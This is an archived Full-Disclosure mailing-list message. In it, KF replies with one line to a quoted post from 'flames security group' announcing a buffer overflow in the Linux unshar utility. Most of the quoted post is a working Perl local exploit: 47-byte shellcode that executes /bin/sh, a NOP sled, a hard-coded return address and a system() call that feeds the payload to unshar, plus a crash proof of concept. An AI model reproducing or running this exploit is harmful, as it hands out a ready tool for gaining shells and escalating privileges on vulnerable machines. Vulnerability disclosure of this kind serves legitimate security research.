lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: dotslash at snosoft.com (KF)
Subject: flames security group start to play , yet another
 vuln found (rustymemory and welshboi)

if you are bored .... download unrar.
-KF


rustymemory wrote:

>By: flames.bluefox.net.nz
>if unshar suid; then you w00t
>
>proof of concept?
>
>rustymemory@...mes:~$ unshar -f `perl -e 'print"A"x2000'`
>............................AAAAAAAAAAAAAASegmentation fault
>
>welshboi@...mes:~$ more unshar.pl
>#!/usr/bin/perl
>#/usr/bin/unshar local sploit.
>#coded by welshboi (deadbeat)
>#found by rustymemory
>#
>#FLAMES SECURITY GROUP
>#Private, please dont distribute
>#affects all linux distributions , tested on slackware 9.1 and MDK
>###############################################
>#[deadbeat@...achu sploits]$ perl unshar.pl #
># #
>#[] /usr/bin/unshar exploit #
>#[] coded by: deadbeat [] #
>#[] found by: rustymemory [] #
>#_f1GWugHu[SPZ #
># #
>#sh-2.05b$ #
>###############################################
># 47byte shellcode (exec /bin/sh)
>$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
>"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
>"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
>"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
>$egg = 2000;
>$buf = 1128;
>$nop = "\x90";
>$offset = 0;
>$ret =0x40055bdc;
>if(@ARGV == 1) {$offset = $ARGV[0];}
>$addr = pack('l', ($ret + $offset));
>for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
>for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
>$evil .= $hell;
>print "\n[] /usr/bin/unshar exploit []\n";
>print "[] coded by: deadbeat, uk2sec []\n";
>print "[] found by: rustymemory []\n\n";
>print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
>system("/usr/bin/unshar -f $evil");
>
>---------------------------------------------------------
>shouts to ?
>
>calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest 
>of flames security group. and rusty's fiancee
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>  
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ